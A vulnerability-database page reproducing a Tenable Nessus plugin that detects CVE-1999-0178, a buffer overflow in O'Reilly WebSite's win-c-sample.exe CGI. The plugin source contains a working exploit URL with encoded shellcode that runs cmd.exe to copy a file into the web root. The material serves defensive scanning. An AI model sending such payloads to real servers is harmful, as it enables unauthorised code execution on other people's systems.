O'Reilly WebSite win-c-sample Remote Overflow

🗓️ 22 Jun 1999 00:00:00Reported by TenableType

Vulnerability in O'Reilly WebSite allows buffer overflow leading to arbitrary code execution.

Reporter	Title	Published	Views	Family All 4
CVE	CVE-1999-0178	29 Sep 199904:00	–	cve
Cvelist	CVE-1999-0178	29 Sep 199904:00	–	cvelist
EUVD	EUVD-1999-0178	7 Oct 202500:30	–	euvd
NVD	CVE-1999-0178	1 Jan 199705:00	–	nvd

Source	Link
seclists	www.seclists.org/bugtraq/1997/Jan/25
cve	www.cve.mitre.org/cgi-bin/cvename.cgi

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if(description)
{
 script_id(10008);
 script_version("1.43");

 script_cve_id("CVE-1999-0178");
 script_bugtraq_id(2078);

 script_name(english:"O'Reilly WebSite win-c-sample Remote Overflow");
 script_summary(english:"WebSite 1.0 CGI arbitrary code execution");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a remote buffer overflow attack." );
 script_set_attribute(attribute:"description", value:
"This web server appears to be a version of O'Reilly WebSite that has a
buffer overflow vulnerability in its '/cgi-shl/win-c-sample.exe'
script.  By passing a specially crafted argument to this script, an
unauthenticated, remote attacker can leverage this overflow to execute
arbitrary code on the affected host subject to the privileges under
which the service operates." );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://seclists.org/bugtraq/1997/Jan/25"
 );
 script_set_attribute(attribute:"solution", value:
"Upgrade to O'Reilly WebSite version 2.5, which reportedly addresses
the vulnerability."		 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(
  attribute:"vuln_publication_date", 
  value:"1997/01/06"
 );
 script_set_attribute(
  attribute:"plugin_publication_date", 
  value:"1999/06/22"
 );
 script_set_attribute(attribute:"plugin_modification_date", value:"2025/09/29");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_copyright(english:"This script is Copyright (C) 1999-2025 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_category(ACT_DESTRUCTIVE_ATTACK);

 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

##########################
#			 #
# The actual script code # 
#			 #
##########################

include("http.inc");
include("torture_cgi.inc");

port = get_http_port(default:80);


outfile = string("x1-", unixtime(), ".htm");
command = "/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\"+outfile;

res = is_cgi_installed3(item:outfile, port:port);
if(!res)
{
 is_cgi_installed3(item:command, port:port);
 res = is_cgi_installed3(item:outfile, port:port);
 if(res)
 {
  if (report_verbosity > 0)
  {
   report = string(
    "\n",
    "Nessus was able to verify the vulnerability exists using the following\n",
    "URLs :\n",
    "\n",
    "  ", build_url(port:port, qs:command), "\n",
    "  ", build_url(port:port, qs:"/"+outfile), "\n"
   );
   security_hole(port:port, extra:report);
  }
  else security_hole(port);
 }
}

29 Sep 2025 00:00Current

5.9Medium risk

Vulners AI Score5.9

CVSS 27.5

EPSS0.06961